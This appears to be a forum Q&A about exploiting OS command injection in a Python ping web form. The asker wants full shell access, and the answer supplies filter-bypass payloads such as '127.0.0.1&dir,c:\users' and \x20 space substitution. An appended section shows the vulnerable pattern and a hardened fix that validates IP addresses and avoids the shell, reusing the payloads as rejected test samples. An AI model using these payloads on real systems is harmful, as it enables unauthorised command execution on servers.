
When I entered 127.0.0.1 the result was:

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms 

When I entered 127.0.0.1%00 I got the following result:

Traceback (most recent call last):
  File "C:\Inetpub\wwwroot\pingit.py", line 9, in
    output=os.popen("ping " + form["action"].value).readlines()
TypeError: popen() argument 1 must be string without null bytes, not str

I can execute single-word commands like dir, whoami, etc., e.g.:

127.0.0.1 | dir

and

127.0.0.1 | whoami

but I cannot execute the following command:

127.0.0.1 | net user

How can I get full shell command execution with such restrictions?

Aayush

1 Answer

Use the & operator to combine two or more commands on Windows (for Unix use the ; operator).

If you need your command to be a string with no empty spaces, you could replace all space characters with their hex value (\x20), so the dir command would be:

127.0.0.1\x20&\x20dir

Note that this method works only with the Python interpreter.

An alternative that works well with Python's os.popen and on the Windows terminal would be to use a comma between your parameters and remove all spaces between the commands, e.g.:

127.0.0.1&dir,c:\users
t.m.adam
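The traceback in the question and the operators discussed in the answer share one root cause: the form value is concatenated into a string that a shell parses. The following is an added example, not the asker's pingit.py and not the answerer's code; the shape of vulnerable_ping is an assumption reconstructed from the traceback, and the names validate_target, is_accepted, build_ping_command and safe_ping are my own. It places the vulnerable concatenation next to a version that accepts only a literal IP address and runs ping through subprocess.run without a shell, so the `|`, `&`, `,`, `\x20` and null-byte inputs quoted on this page are rejected before any command line exists.

```python
import ipaddress
import os
import subprocess
import sys


# Assumed reproduction of the pattern visible in the question's traceback (the real
# pingit.py is not on the page). cmd.exe parses `target`, so any shell operator in it
# is interpreted as a command separator; this function is kept only as the "before".
def vulnerable_ping(target: str) -> str:
    return os.popen("ping " + target).read()


class InvalidTarget(ValueError):
    """Raised when the submitted target is not a bare IP address."""


def validate_target(raw: str) -> str:
    """Accept only a literal IPv4 or IPv6 address and return it in canonical form.

    Anything else is rejected, so operators, commas, literal backslash escapes and
    embedded null bytes never reach a command line. If hostnames were required, a
    separate allowlist would be the place to handle them, not a looser regex.
    """
    if "\x00" in raw:
        raise InvalidTarget("null byte in target")
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError:
        raise InvalidTarget("target is not an IP address: %r" % raw) from None


def is_accepted(raw: str) -> bool:
    """True if validate_target() would accept raw; convenient for tests and logging."""
    try:
        validate_target(raw)
        return True
    except InvalidTarget:
        return False


def build_ping_command(raw: str) -> list:
    """Build argv for ping. No shell is involved, so the target is a single argument
    and is never scanned for `|`, `&` or any other operator."""
    target = validate_target(raw)
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "4", target]


def safe_ping(raw: str, timeout: float = 20.0) -> str:
    """Run ping without a shell and return its stdout, or raise InvalidTarget."""
    completed = subprocess.run(
        build_ping_command(raw),
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )
    return completed.stdout


if __name__ == "__main__":
    # Constructed inputs: the benign address plus the payload shapes quoted on the page.
    samples = [
        "127.0.0.1",
        "127.0.0.1 | dir",
        "127.0.0.1\x00",
        "127.0.0.1\\x20&\\x20dir",
        "127.0.0.1&dir,c:\\users",
    ]
    for sample in samples:
        print("%-30r accepted=%s" % (sample, is_accepted(sample)))
```

Running the module prints one line per sample; only the bare address is accepted. The null-byte TypeError from the question disappears as a side effect, because the input is rejected by validate_target before os.popen or subprocess ever sees it, and the rejection can be logged as a signal that someone is probing the form.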